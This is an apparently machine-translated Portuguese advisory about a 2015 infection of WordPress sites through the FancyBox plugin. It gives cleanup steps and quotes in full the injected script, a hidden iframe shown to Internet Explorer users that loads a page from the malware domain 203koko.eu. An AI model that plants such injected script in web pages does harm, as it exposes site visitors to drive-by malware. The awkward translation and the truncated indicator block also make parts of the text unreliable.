No início desta semana uma série de sites e blogs WordPress, recebeu avisos de infecção por malware através Google Webmasters.
O problema a que Google Webmasters referido é a presença de um código / escrita malware de iframe os sites de origem.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Parece que é um vulnerabilidade a plug-inacervo Caixa de fantasia para WordPress que até ontem (05.02.2015) não tinha sido atualizado por um longo tempo.
Resolver este problema e desinfecção de vírus locais com este malware, é relativamente simples.
1. Desative o plugin FancyBox.
2. Exclua todos os arquivos do plug-in do FancyBox do servidor (via FTP)
3. Instale a nova versão do plugin (FancyBox 3.0.4)
Caixa de fantasia para WordPress 3.0.4
- Renomeado a configuração afetada pelo problema de segurança mencionado em 3.0.3. Isso deve impedir que o código malicioso apareça em sites onde o plug-in está updated sem remover o código malicioso.
Caixa de fantasia para WordPress 3.0.3
- Corrigido um problema de segurança.
Informação de Malware:
TIPO: Iframe redirecionamento
TARGET: WordPress Caixa chique
DOMÍNIO malware: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CÓDIGOS:
MALWARE ESCRITO: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Remova malware do seu WordPress site do Network Development Group.